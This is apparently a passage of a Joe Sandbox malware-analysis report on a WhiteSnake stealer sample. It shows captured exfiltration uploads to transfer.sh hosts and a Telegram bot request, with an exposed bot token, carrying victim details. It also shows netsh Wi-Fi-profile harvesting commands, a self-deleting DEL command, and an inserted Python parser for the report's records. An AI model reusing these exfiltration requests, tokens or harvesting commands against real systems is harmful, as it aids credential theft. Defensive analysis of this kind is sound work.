    Data Ascii: ekb`2T2\,N$_t:Q*VHX9):mr(*(4Nez#Ui{3n~QB5./pA.'wghZHJV99 et`h[hhwQ'7Sfr@!x"XaX&VdgH>!1a>A
Dec 8, 2024 13:02:02.793690920 CET | 1236 | OUT | Data Raw: b9 51 84 95 cb 5a e5 26 b8 55 a4 c1 bb 19 b3 68 36 fd a3 43 62 c3 b8 b8 8e 4e ef a7 db b3 17 1c f0 d0 1c ba 87 c7 74 95 e6 35 90 e5 00 11 0d ef fd be e7 16 16 b9 12 d2 d2 02 90 84 a1 5d a4 d6 c4 06 13 11 8b 1a 40 ed fe a0 4a 26 2f 93 c5 82 4e ab
    Data Ascii: QZ&Uh6CbNt5]@J&/N=FIAAIKRv~??6BHgjFw;FaXu%KP@=GEp/k\~I$uOP[Gmk&.:v`d^v
Dec 8, 2024 13:02:02.913774967 CET | 12360 | OUT | Data Raw: d1 e1 34 1f 75 49 56 76 23 87 65 44 15 ff 2d f9 63 66 2c 95 3c 92 89 93 bc 3e af 71 06 78 75 2a ec bf 96 ff cd 7a db 36 72 ba 69 11 fa 26 9a bf 00 50 e5 97 97 b9 9f fd 1e cd 3e 4b 0b f0 54 42 69 88 f5 0c 7c fd bf 48 09 20 26 4b 5b 13 f3 35 5c d4
    Data Ascii: 4uIVv#eD-cf,<>qxu*z6ri&P>KTBi|H &K[5\mSKD2"t7;E<q.y(>JWn#Qm%4"\zw}CLqJ]=%g5rC("X.cp)*I.%Cq.E-nL;&n"Y
Dec 8, 2024 13:02:02.956808090 CET | 28428 | OUT | Data Raw: 3d cc b1 cf af 5c 1f 53 0d b5 09 15 ad d7 63 29 1d 95 2f 2e 81 e4 dd 93 ee 93 f6 13 ac 06 35 f2 98 a8 86 bf 68 56 05 2e df 8a dd 7e 18 b2 8a b0 89 cb 76 9d f7 5c fd b0 6c 2f fc 02 84 6a c7 b8 08 74 14 cf 29 73 ac b4 27 b0 d7 f5 f0 9f 82 43 ec a6
    Data Ascii: =\Sc)/.5hV.~v\l/jt)s'C"tXRi6!uv yClPEzY':b\}Z6C`6Wrtn!gYQJ':s_/ky UEp^R]B~{n
Dec 8, 2024 13:02:03.076611042 CET | 7416 | OUT | Data Raw: ef bc a4 b2 79 35 51 f3 6f bf 39 3a 3a 66 90 0e d1 b3 67 aa 88 70 18 df 82 b1 14 fa 81 22 a7 f4 5b 08 b6 f9 6e 8f 59 ee f3 bb 6c bb c0 2e fe 2d f6 02 e1 51 79 19 cb 8d 21 80 8b 20 7d dc f9 ff fb 99 70 9e e2 d2 35 cd 1d d6 66 b0 07 04 28 c9 75 4a
    Data Ascii: y5Qo9::fgp"[nYl.-Qy! }p5f(uJ0$1rrE/8Vbg(~)Q4ec)4= _J`3TD @yj_r,U*TKE< f$z~H<>h?kxd,lXfehP!d~5YQmF
Dec 8, 2024 13:02:03.196350098 CET | 1236 | OUT | Data Raw: 0c 98 aa 13 63 ce 30 c2 5c 47 92 f7 9d 0c 72 ed e8 65 5b 53 cb 7d 27 bf d6 85 80 29 2c ff ef e8 67 75 79 ad 3e b6 c8 97 a6 17 75 a0 5d 16 d1 38 2a 2e 33 b9 e4 fa c2 bb d2 a3 88 91 3e fc 4b 7a ee 98 c7 2d 49 ca 3e de fc 2f b2 96 50 ef 93 ef a7 fe
    Data Ascii: c0\Gre[S}'),guy>u]8*.3>Kz-I>/PQqIs:>C2+Srm lx`L"YU[OR|Nb*rYC!36ThBbl`@rKc43vwIao-_W[
Dec 8, 2024 13:02:03.300900936 CET | 48138 | OUT | Data Raw: 52 45 42 0d 44 ae 8b d5 2d a3 46 26 92 4e 12 e6 f4 7c b5 d5 17 a5 e0 29 78 dc 8f ba 02 c7 83 3d 13 12 3c 86 d4 01 66 b1 21 e2 d2 0e f0 e6 0e 60 9f 1c a5 87 3e e5 bb e7 8f 35 45 04 f2 31 ee f2 95 08 1a b9 da bb ba c2 58 b7 6b 06 89 ef 16 ee f6 2b
    Data Ascii: REBD-F&N|)x=<f!`>5E1Xk+p_B|@a'XE;o'U}(LI2A`=ek\Caa:D+$fq<\7@:CCK]O6hats2S!Xbl+b^(OAA>
Dec 8, 2024 13:02:04.201113939 CET | 321 | IN | HTTP/1.1 500 Internal Server Error
    Content-Type: text/plain; charset=utf-8
    Server: Transfer.sh HTTP Server
    X-Content-Type-Options: nosniff
    X-Made-With: <3 by DutchCoders
    X-Served-By: Proudly served by DutchCoders
    Date: Sun, 08 Dec 2024 12:02:04 GMT
    Content-Length: 24
    Connection: close
    Data Raw: 43 6f 75 6c 64 20 6e 6f 74 20 73 61 76 65 20 6d 65 74 61 64 61 74 61 0a
    Data Ascii: Could not save metadata


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
4 | 192.168.2.4 | 49734 | 206.166.251.4 | 8080 | 7496 | C:\Users\user\Desktop\BA9qyj2c9G.exe
Timestamp | Bytes transferred | Direction | Data
Dec 8, 2024 13:02:04.321546078 CET | 145 | OUT | PUT /yrABY_user%40841618_report.wsr HTTP/1.1
    Host: 206.166.251.4:8080
    Content-Length: 134658
    Expect: 100-continue
    Connection: Keep-Alive


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
5 | 192.168.2.4 | 49741 | 51.159.4.50 | 8080 | 7496 | C:\Users\user\Desktop\BA9qyj2c9G.exe
Timestamp | Bytes transferred | Direction | Data
Dec 8, 2024 13:02:26.341589928 CET | 143 | OUT | PUT /yrABY_user%40841618_report.wsr HTTP/1.1
    Host: 51.159.4.50:8080
    Content-Length: 134658
    Expect: 100-continue
    Connection: Keep-Alive
Dec 8, 2024 13:02:27.591255903 CET | 25 | IN | HTTP/1.1 100 Continue
Dec 8, 2024 13:02:28.197559118 CET | 376 | IN | HTTP/1.1 200 OK
    Content-Type: text/plain
    Server: Transfer.sh HTTP Server
    X-Made-With: <3 by DutchCoders
    X-Served-By: Proudly served by DutchCoders
    X-Url-Delete: http://51.159.4.50:8080/3TJejBPXtn/yrABY_user@841618_report.wsr/RLhWMtp53nxXPwvrOIo0
    Date: Sun, 08 Dec 2024 12:02:28 GMT
    Content-Length: 64
    Data Raw: 68 74 74 70 3a 2f 2f 35 31 2e 31 35 39 2e 34 2e 35 30 3a 38 30 38 30 2f 33 54 4a 65 6a 42 50 58 74 6e 2f 79 72 41 42 59 5f 6a 6f 6e 65 73 40 38 34 31 36 31 38 5f 72 65 70 6f 72 74 2e 77 73 72
    Data Ascii: http://51.159.4.50:8080/3TJejBPXtn/yrABY_user@841618_report.wsr


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
0 | 192.168.2.4 | 49742 | 149.154.167.220 | 443 | 7496 | C:\Users\user\Desktop\BA9qyj2c9G.exe
Timestamp | Bytes transferred | Direction | Data
2024-12-08 12:02:29 UTC | 888 | OUT | GET /bot7617703274:AAFEXxgPRP1fZGT5UCjcRV4hUZdtNFxyusQ/sendMessage?chat_id=-4568449403&text=%23CRYPTOMAINER%20%20%0A%0A%3Cb%3EOS%3A%3C%2Fb%3E%20%3Ci%3EMicrosoft%20Windows%20NT%206.2.9200.0%3C%2Fi%3E%0A%3Cb%3ECountry%3A%3C%2Fb%3E%20%3Ci%3EUnited%20States%3C%2Fi%3E%0A%3Cb%3EUsername%3A%3C%2Fb%3E%20%3Ci%3Euser%3C%2Fi%3E%0A%3Cb%3ECompname%3A%3C%2Fb%3E%20%3Ci%3E841618%3C%2Fi%3E%0A%0A%3Cb%3EReport%20size%3A%3C%2Fb%3E%200.13Mb%0A&reply_markup=%7B%22inline_keyboard%22%3A%5B%5B%7B%22text%22%3A%22Download%22%2C%22url%22%3A%22http%3A%2F%2F51.159.4.50%3A8080%2Fget%2F3TJejBPXtn%2FyrABY_user%40841618_report.wsr%22%7D%2C%7B%22text%22%3A%22Open%22%2C%22url%22%3A%22http%3A%2F%2F127.0.0.1%3A18772%2FhandleOpenWSR%3Fr%3Dhttp%3A%2F%2F51.159.4.50%3A8080%2Fget%2F3TJejBPXtn%2FyrABY_user%40841618_report.wsr%22%7D%5D%5D%7D&parse_mode=HTML HTTP/1.1
    Host: api.telegram.org
    Connection: Keep-Alive
2024-12-08 12:02:30 UTC | 389 | IN | HTTP/1.1 200 OK
    Server: nginx/1.18.0
    Date: Sun, 08 Dec 2024 12:02:30 GMT
    Content-Type: application/json
    Content-Length: 1079
    Connection: close
    Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
    Access-Control-Allow-Origin: *
    Access-Control-Allow-Methods: GET, POST, OPTIONS
    Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
2024-12-08 12:02:30 UTC | 1079 | IN | Data Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 31 36 32 39 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 37 36 31 37 37 30 33 32 37 34 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 59 6f 75 70 69 6f 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 59 6f 75 70 69 6f 5f 62 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 2d 34 35 36 38 34 34 39 34 30 33 2c 22 74 69 74 6c 65 22 3a 22 4d 61 69 6e 65 72 20 7c 20 4c 6f 67 73 22 2c 22 74 79 70 65 22 3a 22 67 72 6f 75 70 22 2c 22 61 6c 6c 5f 6d 65 6d 62 65 72 73 5f 61 72 65 5f 61 64 6d 69 6e 69 73 74 72 61 74 6f 72 73 22 3a 74 72 75 65 7d 2c 22 64 61 74 65 22 3a 31 37 33 33 36 35 39 33 35 30 2c 22 74 65 78 74 22 3a 22 23 43
                                                                                                                                                            Data Ascii: {"ok":true,"result":{"message_id":1629,"from":{"id":7617703274,"is_bot":true,"first_name":"Youpio","username":"Youpio_bot"},"chat":{"id":-4568449403,"title":"Mainer | Logs","type":"group","all_members_are_administrators":true},"date":1733659350,"text":"#C


Target ID: 0
Start time: 07:01:51
Start date: 08/12/2024
Path: C:\Users\user\Desktop\BA9qyj2c9G.exe
Wow64 process (32bit): false
Commandline: "C:\Users\user\Desktop\BA9qyj2c9G.exe"
Imagebase: 0x11852f50000
File size: 167'424 bytes
MD5 hash: C9495B3A992EA3E2EF2788C7BA7ED840
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Yara matches:
• Rule: JoeSecurity_WhiteSnake, Description: Yara detected WhiteSnake Stealer, Source: 00000000.00000002.2014927487.0000011854B31000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
Reputation: low
Has exited: true

Target ID: 1
Start time: 07:01:52
Start date: 08/12/2024
Path: C:\Windows\System32\cmd.exe
Wow64 process (32bit): false
Commandline: "cmd.exe" /c chcp 65001 && netsh wlan show profiles|findstr /R /C:"[ ]:[ ]"
Imagebase: 0x7ff607520000
File size: 289'792 bytes
MD5 hash: 8A2122E8162DBEF04694B9C3E0B6CDEE
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Reputation: high
Has exited: true

Target ID: 2
Start time: 07:01:52
Start date: 08/12/2024
Path: C:\Windows\System32\conhost.exe
Wow64 process (32bit): false
Commandline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase: 0x7ff7699e0000
File size: 862'208 bytes
MD5 hash: 0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Reputation: high
Has exited: true

Target ID: 3
Start time: 07:01:52
Start date: 08/12/2024
Path: C:\Windows\System32\chcp.com
Wow64 process (32bit): false
Commandline: chcp 65001
Imagebase: 0x7ff6c0af0000
File size: 14'848 bytes
MD5 hash: 33395C4732A49065EA72590B14B64F32
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Reputation: high
Has exited: true

Target ID: 4
Start time: 07:01:52
Start date: 08/12/2024
Path: C:\Windows\System32\netsh.exe
Wow64 process (32bit): false
Commandline: netsh wlan show profiles
Imagebase: 0x7ff60af60000
File size: 96'768 bytes
MD5 hash: 6F1E6DD688818BC3D1391D0CC7D597EB
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Reputation: moderate
Has exited: true

Target ID: 5
Start time: 07:01:52
Start date: 08/12/2024
Path: C:\Windows\System32\findstr.exe
Wow64 process (32bit): false
Commandline: findstr /R /C:"[ ]:[ ]"
Imagebase: 0x7ff72bc60000
File size: 36'352 bytes
MD5 hash: 804A6AE28E88689E0CF1946A6CB3FEE5
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Reputation: moderate
Has exited: true

Target ID: 6
Start time: 07:01:52
Start date: 08/12/2024
Path: C:\Windows\System32\cmd.exe
Wow64 process (32bit): false
Commandline: "cmd.exe" /c chcp 65001 && netsh wlan show networks mode=bssid | findstr "SSID BSSID Signal"
Imagebase: 0x7ff607520000
File size: 289'792 bytes
MD5 hash: 8A2122E8162DBEF04694B9C3E0B6CDEE
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Reputation: high
Has exited: true

Target ID: 7
Start time: 07:01:52
Start date: 08/12/2024
Path: C:\Windows\System32\conhost.exe
Wow64 process (32bit): false
Commandline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase: 0x7ff7699e0000
File size: 862'208 bytes
MD5 hash: 0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Reputation: high
Has exited: true

Target ID: 8
Start time: 07:01:52
Start date: 08/12/2024
Path: C:\Windows\System32\chcp.com
Wow64 process (32bit): false
Commandline: chcp 65001
Imagebase: 0x7ff6c0af0000
File size: 14'848 bytes
MD5 hash: 33395C4732A49065EA72590B14B64F32
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Reputation: high
Has exited: true

Target ID: 9
Start time: 07:01:52
Start date: 08/12/2024
Path: C:\Windows\System32\netsh.exe
Wow64 process (32bit): false
Commandline: netsh wlan show networks mode=bssid
Imagebase: 0x7ff60af60000
File size: 96'768 bytes
MD5 hash: 6F1E6DD688818BC3D1391D0CC7D597EB
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Reputation: moderate
Has exited: true

Target ID: 10
Start time: 07:01:52
Start date: 08/12/2024
Path: C:\Windows\System32\findstr.exe
Wow64 process (32bit): false
Commandline: findstr "SSID BSSID Signal"
Imagebase: 0x7ff72bc60000
File size: 36'352 bytes
MD5 hash: 804A6AE28E88689E0CF1946A6CB3FEE5
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Has exited: true

Target ID: 14
Start time: 07:02:29
Start date: 08/12/2024
Path: C:\Windows\System32\cmd.exe
Wow64 process (32bit): false
Commandline: "C:\Windows\System32\cmd.exe" /C chcp 65001 && timeout /t 3 > NUL && DEL /F /S /Q /A "C:\Users\user\Desktop\BA9qyj2c9G.exe"
Imagebase: 0x7ff607520000
File size: 289'792 bytes
                                                                                                                                                            MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                            Has exited:true

                                                                                                                                                            Target ID:15
                                                                                                                                                            Start time:07:02:29
                                                                                                                                                            Start date:08/12/2024
                                                                                                                                                            Path:C:\Windows\System32\conhost.exe
                                                                                                                                                            Wow64 process (32bit):false
                                                                                                                                                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                            Imagebase:0x7ff7699e0000
                                                                                                                                                            File size:862'208 bytes
                                                                                                                                                            MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                            Has exited:true

                                                                                                                                                            Target ID:16
                                                                                                                                                            Start time:07:02:29
                                                                                                                                                            Start date:08/12/2024
                                                                                                                                                            Path:C:\Windows\System32\chcp.com
                                                                                                                                                            Wow64 process (32bit):false
                                                                                                                                                            Commandline:chcp 65001
                                                                                                                                                            Imagebase:0x7ff6c0af0000
                                                                                                                                                            File size:14'848 bytes
                                                                                                                                                            MD5 hash:33395C4732A49065EA72590B14B64F32
                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                            Has exited:true

                                                                                                                                                            Target ID:17
                                                                                                                                                            Start time:07:02:29
                                                                                                                                                            Start date:08/12/2024
                                                                                                                                                            Path:C:\Windows\System32\timeout.exe
                                                                                                                                                            Wow64 process (32bit):false
                                                                                                                                                            Commandline:timeout /t 3
                                                                                                                                                            Imagebase:0x7ff757170000
                                                                                                                                                            File size:32'768 bytes
                                                                                                                                                            MD5 hash:100065E21CFBBDE57CBA2838921F84D6
                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                            Has exited:true


Execution Graph

Execution Coverage:18.8%
Dynamic/Decrypted Code Coverage:100%
Signature Coverage:74.1%
Total number of Nodes:27
Total number of Limit Nodes:3
Memory Dump Source
• Source File: 00000000.00000002.2022902119.00007FFD9B720000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B720000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_7ffd9b720000_BA9qyj2c9G.jbxd
Memory Dump Source
• Source File: 00000000.00000002.2022902119.00007FFD9B720000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B720000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_7ffd9b720000_BA9qyj2c9G.jbxd

Control-flow Graph

Memory Dump Source
• Source File: 00000000.00000002.2022902119.00007FFD9B720000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B720000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_7ffd9b720000_BA9qyj2c9G.jbxd

Control-flow Graph

APIs
Memory Dump Source
• Source File: 00000000.00000002.2022902119.00007FFD9B720000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B720000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_7ffd9b720000_BA9qyj2c9G.jbxd
Similarity
• API ID: CryptDataUnprotect
• API String ID: 834300711-0

Control-flow Graph

APIs
Memory Dump Source
• Source File: 00000000.00000002.2022902119.00007FFD9B720000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B720000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_7ffd9b720000_BA9qyj2c9G.jbxd
Similarity
• API ID: AdjustPrivilegesToken
• API String ID: 2874748243-0

Control-flow Graph

APIs
Memory Dump Source
• Source File: 00000000.00000002.2022902119.00007FFD9B720000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B720000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_7ffd9b720000_BA9qyj2c9G.jbxd
Similarity
• API ID: InformationQueryToken
• API String ID: 4239771691-0
                                                                                                                                                              • Opcode ID: db1adadff58f37e5f140482580480a04063bf0cdb7ef4ec0992473d05c41915a
                                                                                                                                                              • Instruction ID: 85923b51158922d51a7bc2578d7a242c298b2851addfb32e83cb69175f5efd21
                                                                                                                                                              • Opcode Fuzzy Hash: db1adadff58f37e5f140482580480a04063bf0cdb7ef4ec0992473d05c41915a
                                                                                                                                                              • Instruction Fuzzy Hash: 27512470908A4C8FDB98DF58C894BE9BBF1FB69310F1081AED04DE3251DA70A985CB44

                                                                                                                                                              Control-flow Graph

                                                                                                                                                              control_flow_graph 1383 7ffd9b72e3e9-7ffd9b72e4d3 NtClose 1387 7ffd9b72e4d5 1383->1387 1388 7ffd9b72e4db-7ffd9b72e519 1383->1388 1387->1388
                                                                                                                                                              APIs
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000000.00000002.2022902119.00007FFD9B720000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B720000, based on PE: false
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_0_2_7ffd9b720000_BA9qyj2c9G.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: Close
                                                                                                                                                              • String ID:
                                                                                                                                                              • API String ID: 3535843008-0
                                                                                                                                                              • Opcode ID: b3b1ab72f5f703515b953508e14451d4eb8da18dc54765237b57bf70a01b86a1
                                                                                                                                                              • Instruction ID: e83fcf01d4f7068ceadd57eba7f42f8319baf119a2d3602fcebd15b5be4682db
                                                                                                                                                              • Opcode Fuzzy Hash: b3b1ab72f5f703515b953508e14451d4eb8da18dc54765237b57bf70a01b86a1
                                                                                                                                                              • Instruction Fuzzy Hash: 63414C70E0864C8FDB59DFA8D894BADBBF0FB5A310F1441AED049E7252DA74A845CB41

                                                                                                                                                              Control-flow Graph

                                                                                                                                                              control_flow_graph 1450 7ffd9b727b5d-7ffd9b727c47 CryptUnprotectData 1455 7ffd9b727c4f-7ffd9b727cc1 1450->1455 1456 7ffd9b727c49 1450->1456 1456->1455
                                                                                                                                                              APIs
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000000.00000002.2022902119.00007FFD9B720000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B720000, based on PE: false
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_0_2_7ffd9b720000_BA9qyj2c9G.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: CryptDataUnprotect
                                                                                                                                                              • String ID:
                                                                                                                                                              • API String ID: 834300711-0
                                                                                                                                                              • Opcode ID: b777c12cf1688e46964b30c03338228adc026e5925a48ac432888d10ea2f9924
                                                                                                                                                              • Instruction ID: 9be4a4ef7ad59051df3107ea23f4c924ba3d66862f2d7ecf0069c8a2900c3617
                                                                                                                                                              • Opcode Fuzzy Hash: b777c12cf1688e46964b30c03338228adc026e5925a48ac432888d10ea2f9924
                                                                                                                                                              • Instruction Fuzzy Hash: F741C930918A1D8FDB94DF58C894BE9B7B1FB59300F0092E9D40DE3255DB74AA84CF41
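The records above are Joe Sandbox's per-function summaries for the non-PE memory region at 0x7FFD9B720000: a one-line control_flow_graph edge list (basic-block id, address range, the API called from that block, then id->id edges) followed by the bulleted ID and fuzzy-hash fields. Pulling those into structures is what lets an analyst ask "which functions in this dump call CryptUnprotectData" or reuse the Opcode IDs and fuzzy hashes to cluster samples. The following Python is an added example, not code from the report or from Joe Sandbox; SAMPLE is copied from the records on this page with the indentation stripped, while the minimum of eight hex digits for a block address and the triage notes in NOTES are my assumptions.

```python
"""Parser for Joe Sandbox function-summary records: the one-line control_flow_graph
edge list plus the bulleted API ID / Opcode ID / fuzzy-hash fields that follow it."""
import re
from dataclasses import dataclass, field

# Constructed sample: selected lines from three records above, indentation stripped.
SAMPLE = """\
Control-flow Graph
control_flow_graph 1195 7ffd9b72b2f5-7ffd9b72b445 NtQueryInformationToken 1202 7ffd9b72b44d-7ffd9b72b499 1195->1202 1203 7ffd9b72b447 1195->1203 1203->1202
• API ID: InformationQueryToken
• API String ID: 4239771691-0
• Opcode ID: db1adadff58f37e5f140482580480a04063bf0cdb7ef4ec0992473d05c41915a
• Instruction Fuzzy Hash: 27512470908A4C8FDB98DF58C894BE9BBF1FB69310F1081AED04DE3251DA70A985CB44
Control-flow Graph
control_flow_graph 1450 7ffd9b727b5d-7ffd9b727c47 CryptUnprotectData 1455 7ffd9b727c4f-7ffd9b727cc1 1450->1455 1456 7ffd9b727c49 1450->1456 1456->1455
• API ID: CryptDataUnprotect
• API String ID: 834300711-0
• Opcode ID: b777c12cf1688e46964b30c03338228adc026e5925a48ac432888d10ea2f9924
• Instruction Fuzzy Hash: F741C930918A1D8FDB94DF58C894BE9B7B1FB59300F0092E9D40DE3255DB74AA84CF41
Strings
• API ID:
• String ID: U
• API String ID: 0-3372436214
• Opcode ID: 7bac35e52e4a72dd915fff0a7cfc6dc2e3df5cc60c7f19b07d2e7450c70423d4
• Instruction Fuzzy Hash: F3715F30E0965D8FDB55EFA8C464BACBBB2FF59301F5501AAD00DE72A6CE359941CB01
"""

EDGE_RE = re.compile(r"^(\d+)->(\d+)$")
# Assumption: a block address has at least 8 lowercase hex digits, so it never collides with the short decimal block ids.
ADDR_RE = re.compile(r"^([0-9a-f]{8,})(?:-([0-9a-f]{8,}))?$")
FIELD_RE = re.compile(r"^(?:\u2022\s*)?([A-Za-z][A-Za-z ]*):\s*(.*)$")
# Assumed triage notes: why an analyst cares when a stealer calls these APIs.
NOTES = {
    "CryptUnprotectData": "DPAPI decryption, typical for saved browser/mail credential blobs",
    "NtQueryInformationToken": "token inspection, typically integrity level or privilege checks",
}

@dataclass
class Node:
    nid: int
    start: int
    end: int
    apis: list = field(default_factory=list)

@dataclass
class Function:
    fields: dict = field(default_factory=dict)   # API ID, Opcode ID, fuzzy hashes, ...
    nodes: dict = field(default_factory=dict)    # block id -> Node
    edges: list = field(default_factory=list)    # (from id, to id)

    @property
    def entry(self):
        return min(n.start for n in self.nodes.values()) if self.nodes else None

    @property
    def apis(self):
        return sorted({a for n in self.nodes.values() for a in n.apis})

def parse_cfg(line):
    """'control_flow_graph ID RANGE [API ...] ... A->B ...' -> (nodes, edges)."""
    toks = line.split()[1:]
    nodes, edges, cur, i = {}, [], None, 0
    while i < len(toks):
        edge = EDGE_RE.match(toks[i])
        if edge:
            edges.append((int(edge.group(1)), int(edge.group(2))))
        elif toks[i].isdigit() and i + 1 < len(toks) and (am := ADDR_RE.match(toks[i + 1])):
            start = int(am.group(1), 16)
            end = int(am.group(2), 16) if am.group(2) else start
            cur = nodes[int(toks[i])] = Node(int(toks[i]), start, end)
            i += 1                       # the range token was consumed as well
        elif cur is not None:
            cur.apis.append(toks[i])     # any other token is an API called from that block
        i += 1
    return nodes, edges

def parse_report(text):
    """A record ends at its 'Instruction Fuzzy Hash' field; a control_flow_graph line
    precedes the record it belongs to.  Headings without a colon carry no data."""
    funcs, cur = [], Function()
    for raw in text.splitlines():
        line = raw.strip()
        if line.startswith("control_flow_graph "):
            cur.nodes, cur.edges = parse_cfg(line)
        elif (m := FIELD_RE.match(line)):
            key = m.group(1).strip()
            cur.fields[key] = m.group(2).strip()
            if key == "Instruction Fuzzy Hash":
                funcs.append(cur)
                cur = Function()
    return funcs

def triage(funcs):
    """One (entry address, API, note) row per call to an API listed in NOTES."""
    return [(f"{f.entry:x}", api, NOTES[api])
            for f in funcs for api in f.apis if api in NOTES]
```

To use it on a full report saved as text, call parse_report(open(path, encoding="utf-8").read()) and feed the result to triage(); the Opcode ID, Instruction ID and both fuzzy hashes of every function stay available in Function.fields, so the same structures can be dumped to a table and compared across WhiteSnake samples. Functions with an empty block list, such as the String ID record in the sample, have no entry address and are simply skipped by triage().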
                                                                                                                                                              Strings
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000000.00000002.2022902119.00007FFD9B720000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B720000, based on PE: false
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_0_2_7ffd9b720000_BA9qyj2c9G.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID:
                                                                                                                                                              • String ID: U
                                                                                                                                                              • API String ID: 0-3372436214
                                                                                                                                                              • Opcode ID: 7bac35e52e4a72dd915fff0a7cfc6dc2e3df5cc60c7f19b07d2e7450c70423d4
                                                                                                                                                              • Instruction ID: d96ff0059dcf108f0037b2c76aa52c88c3467f615005fa371cc3381878597438
                                                                                                                                                              • Opcode Fuzzy Hash: 7bac35e52e4a72dd915fff0a7cfc6dc2e3df5cc60c7f19b07d2e7450c70423d4
                                                                                                                                                              • Instruction Fuzzy Hash: F3715F30E0965D8FDB55EFA8C464BACBBB2FF59301F5501AAD00DE72A6CE359941CB01
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000000.00000002.2022902119.00007FFD9B720000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B720000, based on PE: false
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_0_2_7ffd9b720000_BA9qyj2c9G.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID:
                                                                                                                                                              • String ID:
                                                                                                                                                              • API String ID:
                                                                                                                                                              • Opcode ID: 2e9558ff75b8dbabc80a263dc7700e8ed41cadf0e4243610029a0682181dcb99
                                                                                                                                                              • Instruction ID: cf88bf2d5da4985271eeee836b3c15294c8761b10eec94dc517c22f2be64063a
                                                                                                                                                              • Opcode Fuzzy Hash: 2e9558ff75b8dbabc80a263dc7700e8ed41cadf0e4243610029a0682181dcb99
                                                                                                                                                              • Instruction Fuzzy Hash: 9E42AF30E0A69D8FD769DF65C4647A87BB0EF56304F4101FED04DEB2A6DA385A84CB10
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000000.00000002.2022902119.00007FFD9B720000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B720000, based on PE: false
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_0_2_7ffd9b720000_BA9qyj2c9G.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID:
                                                                                                                                                              • String ID:
                                                                                                                                                              • API String ID:
